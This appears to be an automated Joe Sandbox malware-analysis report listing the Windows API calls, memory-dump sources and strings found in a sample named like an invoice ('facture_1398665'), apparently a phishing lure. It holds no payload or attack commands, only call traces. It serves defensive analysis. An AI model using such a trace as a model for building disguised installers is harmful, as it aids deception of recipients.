    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010), ref: 0046576D
    • GetTickCount.KERNEL32(00000000,000000FF,?,?,?,?,00000010,00000000,00465875), ref: 00465772
    • SystemParametersInfoW.USER32(00001016,00000000,?,00000000), ref: 004657D1
    • SystemParametersInfoW.USER32(00001018,00000000,00000000,00000000), ref: 004657E9
      • Part of subcall function 00468FC4: GetCursorPos.USER32(?), ref: 00468FC8
    • AnimateWindow.USER32(00000000,00000064,?), ref: 0046582E
    • ShowWindow.USER32(00000000,00000004), ref: 0046583F
    • GetTickCount.KERNEL32(0046587C), ref: 0046585C
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetVersion.KERNEL32(00000000,0044E0C4), ref: 0044DE99
    • InsertMenuItemW.USER32(?,000000FF,000000FF,00000030), ref: 0044E012
    • InsertMenuW.USER32(?,000000FF,00000000,?,00000000), ref: 0044E0A1
      • Part of subcall function 0044E388: CreatePopupMenu.USER32 ref: 0044E3A6
      • Part of subcall function 0044E388: CreateMenu.USER32 ref: 0044E3B3
    • InsertMenuW.USER32(?,000000FF,00000000,00000000,00000000), ref: 0044E085
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004AE6CE
      • Part of subcall function 0047F6B4: GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 0047F6EA
      • Part of subcall function 004AD53C: MoveFileExW.KERNEL32(00000000,00000000,00000000), ref: 004AD596
      • Part of subcall function 004AD53C: GetLastError.KERNEL32(00000000,004AD5BC,?,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004AD59E
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
      • Part of subcall function 0047F714: GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004AE66B,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000), ref: 0047F727
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047DD18: GetActiveWindow.USER32 ref: 0047DD3F
      • Part of subcall function 0047DD18: GetLastActivePopup.USER32(?), ref: 0047DD54
    • GetWindowRect.USER32(?,?), ref: 0047C8F3
    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0047C92E
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    • MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 0047C96D
    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0047C9C0
      • Part of subcall function 00470CC0: IsWindow.USER32(?), ref: 00470CCE
      • Part of subcall function 00470CC0: EnableWindow.USER32(?,000000FF), ref: 00470CDD
    • SetActiveWindow.USER32(00000000), ref: 0047C9D1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00458A04: WindowFromPoint.USER32(-000000F4,?), ref: 00458A0A
      • Part of subcall function 00458A04: GetParent.USER32(00000000), ref: 00458A21
    • GetWindow.USER32(00000000,00000004), ref: 004585E6
    • GetCurrentThreadId.KERNEL32(00458564,?,?,-0000000C,?), ref: 004586BD
    • EnumThreadWindows.USER32(00000000,00458564,?), ref: 004586C3
    • GetWindowRect.USER32(00000000,?), ref: 004586DA
      • Part of subcall function 00457870: GetWindowThreadProcessId.USER32(00000000), ref: 0045787D
      • Part of subcall function 00457870: GetCurrentProcessId.KERNEL32(?,01484140,00000000,0047DF65,?,01484140,?,01484141,0047C338,?,?,?,?,01484140), ref: 00457886
      • Part of subcall function 00457870: GlobalFindAtomW.KERNEL32(00000000), ref: 0045789B
      • Part of subcall function 00457870: GetPropW.USER32(00000000,00000000), ref: 004578B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 004368E8
    • CreateHalftonePalette.GDI32(00000000), ref: 004368F5
    • ReleaseDC.USER32(00000000,00000000), ref: 00436904
    • DeleteObject.GDI32(00000000), ref: 00436972
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetSysColor.USER32(00000014), ref: 004A6FA7
    • SetTextColor.GDI32(00000000,00000000), ref: 004A6FBF
    • DrawTextW.USER32(00000000,00000000,?,?,?), ref: 004A6FF5
    • GetSysColor.USER32(00000010), ref: 004A7009
    • SetTextColor.GDI32(00000000,00000000), ref: 004A7021
    • DrawTextW.USER32(?,00000000,?,?,?), ref: 004A7057
    • DrawTextW.USER32(?,00000000,?,?,?), ref: 004A708F
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCursor.USER32 ref: 004C8EDF
    • LoadCursorW.USER32(00000000,00007F02), ref: 004C8EED
    • SetCursor.USER32(00000000), ref: 004C8EF3
    • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02), ref: 004C8EFD
    • SetCursor.USER32(00000000), ref: 004C8F03
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SendMessageW.USER32(00000000,?,?), ref: 004B20ED
      • Part of subcall function 0047BEA4: GetWindowTextW.USER32(?,?,00000100), ref: 0047BED3
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004B2150
    • PostQuitMessage.USER32(?), ref: 004B2163
    • TranslateMessage.USER32(?), ref: 004B216E
    • DispatchMessageW.USER32(?), ref: 004B2177
      • Part of subcall function 00470CC0: IsWindow.USER32(?), ref: 00470CCE
      • Part of subcall function 00470CC0: EnableWindow.USER32(?,000000FF), ref: 00470CDD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004D84C0: GetWindowThreadProcessId.USER32(00000000), ref: 004D84C8
      • Part of subcall function 004D84C0: GetModuleHandleW.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004D8612), ref: 004D84DB
    • SendMessageW.USER32(00000000,0000004A,00000000,?), ref: 004D8620
    • GetTickCount.KERNEL32(00000000,0000004A,00000000,?), ref: 004D8669
    • GetTickCount.KERNEL32 ref: 004D8673
    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004D86C8
      • Part of subcall function 004D8540: SendMessageW.USER32(00000000,00001950,00000001,?), ref: 004D8554
    Strings
    • CallSpawnServer: Unexpected response: $%x, xrefs: 004D8659
    • CallSpawnServer: Unexpected status: %d, xrefs: 004D86B1
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • ImageList_Write.COMCTL32(00000000,?,00000000,0046D13A), ref: 0046D104
      • Part of subcall function 0041253C: GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00412612), ref: 0041257E
      • Part of subcall function 0041253C: GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125B3
      • Part of subcall function 0041253C: VerQueryValueW.VERSION(?,00412624,?,?,00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125CD
    • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 0046D074
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DB0
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DC9
    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000), ref: 004D8DF3
    • CloseHandle.KERNEL32(00000000), ref: 004D8E11
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042DE6C
    • GetSystemMetrics.USER32(00000000), ref: 0042DE81
    • GetSystemMetrics.USER32(00000001), ref: 0042DE8C
    • lstrcpyW.KERNEL32(?,DISPLAY), ref: 0042DEB6
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042DF5C
    • GetSystemMetrics.USER32(00000000), ref: 0042DF71
    • GetSystemMetrics.USER32(00000001), ref: 0042DF7C
    • lstrcpyW.KERNEL32(?,DISPLAY), ref: 0042DFA6
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0042AB97
    • MsgWaitForMultipleObjects.USER32(00000002,?,00000000,000003E8,00000040), ref: 0042ABD8
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042ABC3
      • Part of subcall function 0042A364: GetCurrentThreadId.KERNEL32 ref: 0042A36F
      • Part of subcall function 0042A364: GetCurrentThreadId.KERNEL32 ref: 0042A37E
      • Part of subcall function 0042A364: EnterCriticalSection.KERNEL32(0050AE80), ref: 0042A3C3
      • Part of subcall function 0042A364: InterlockedExchange.KERNEL32(00502EC8,?), ref: 0042A3DF
      • Part of subcall function 0042A364: LeaveCriticalSection.KERNEL32(0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A438
      • Part of subcall function 0042A364: EnterCriticalSection.KERNEL32(0050AE80,0042A4D0,0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A4C3
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0042AC05
    • GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 0042AC10
      • Part of subcall function 0042A824: GetLastError.KERNEL32(?,0042AC22,?,?,?,000000FF), ref: 0042A82B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004330E8: GetObjectW.GDI32(00000000,00000004), ref: 004330FF
      • Part of subcall function 004330E8: GetPaletteEntries.GDI32(00000000,00000000,?,00000028), ref: 00433122
    • GetDC.USER32(00000000), ref: 0043437E
    • CreateCompatibleDC.GDI32(?), ref: 0043438A
    • SelectObject.GDI32(?), ref: 00434397
    • SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 004343BB
    • SelectObject.GDI32(?,?), ref: 004343D5
    • DeleteDC.GDI32(?), ref: 004343DE
    • ReleaseDC.USER32(00000000,?), ref: 004343E9
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004E6CF9), ref: 004E6CDE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCursorPos.USER32 ref: 00479CC3
    • WindowFromPoint.USER32(?,?), ref: 00479CD0
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00479CDE
    • GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00479CE5
    • SendMessageW.USER32(00000000,00000084,00000000,00000000), ref: 00479D08
    • SendMessageW.USER32(00000000,00000020,00000000,?), ref: 00479D1A
    • SetCursor.USER32(00000000), ref: 00479D2C
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 004FAAE9
      • Part of subcall function 00430D88: CreateFontIndirectW.GDI32(?), ref: 00430F23
    • SelectObject.GDI32(00000000,00000000), ref: 004FAB0B
    • GetTextExtentPointW.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,004FB0E7), ref: 004FAB1F
    • GetTextMetricsW.GDI32(00000000,?), ref: 004FAB41
    • ReleaseDC.USER32(00000000,00000000), ref: 004FAB5E
    Strings
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004FAB16
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 004450CB
    • GetTickCount.KERNEL32 ref: 004450F3
    • SendMessageW.USER32(00000000,0000014E,000000FF,00000000), ref: 004451F1
    • SendMessageW.USER32(00000000,00000142,00000000,?), ref: 00445242
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0044539D
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004453EB
      • Part of subcall function 00445464: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 0044553F
      • Part of subcall function 00445464: SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00445554
      • Part of subcall function 00445464: SendMessageW.USER32(00000000,00000142,00000000), ref: 0044562D
      • Part of subcall function 00443CE8: SendMessageW.USER32(00000000,00000157,00000000,00000000), ref: 00443CFC
      • Part of subcall function 00443D0C: SendMessageW.USER32(00000000,0000014F,?,00000000), ref: 00443D28
      • Part of subcall function 00443D0C: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 00443D45
      • Part of subcall function 00444FBC: SendMessageW.USER32(00000000,0000014E,000000FF,00000000), ref: 00445007
      • Part of subcall function 00444FBC: SendMessageW.USER32(00000000,00000142,00000000), ref: 00445038
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7
    • FillRect.USER32(?,?), ref: 00473DAB
    • GetClientRect.USER32(00000000,?), ref: 00473DD6
    • FillRect.USER32(?,?,00000000), ref: 00473DF2
      • Part of subcall function 00473CA0: CallWindowProcW.USER32(?,?,?,?,?), ref: 00473CDA
      • Part of subcall function 00470A60: GetWindowLongW.USER32(?,000000EC), ref: 00470A6D
      • Part of subcall function 00470A60: SetWindowLongW.USER32(?,000000EC,00000000), ref: 00470A90
      • Part of subcall function 00470A60: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00470AA2
    • BeginPaint.USER32(?,?), ref: 00473E6A
    • GetWindowRect.USER32(?,?), ref: 00473E97
      • Part of subcall function 004595F0: GetWindowOrgEx.GDI32(?), ref: 004595FE
      • Part of subcall function 004595F0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00459614
      • Part of subcall function 00460EBC: BeginPaint.USER32(00000000,?), ref: 00460EE7
      • Part of subcall function 00460EBC: SaveDC.GDI32(00000000), ref: 00460F20
      • Part of subcall function 00460EBC: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 00460FA2
      • Part of subcall function 00460EBC: RestoreDC.GDI32(00000000,?), ref: 00460FD8
      • Part of subcall function 00460EBC: EndPaint.USER32(00000000,?), ref: 00461015
    • EndPaint.USER32(?,?), ref: 00473EF7
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
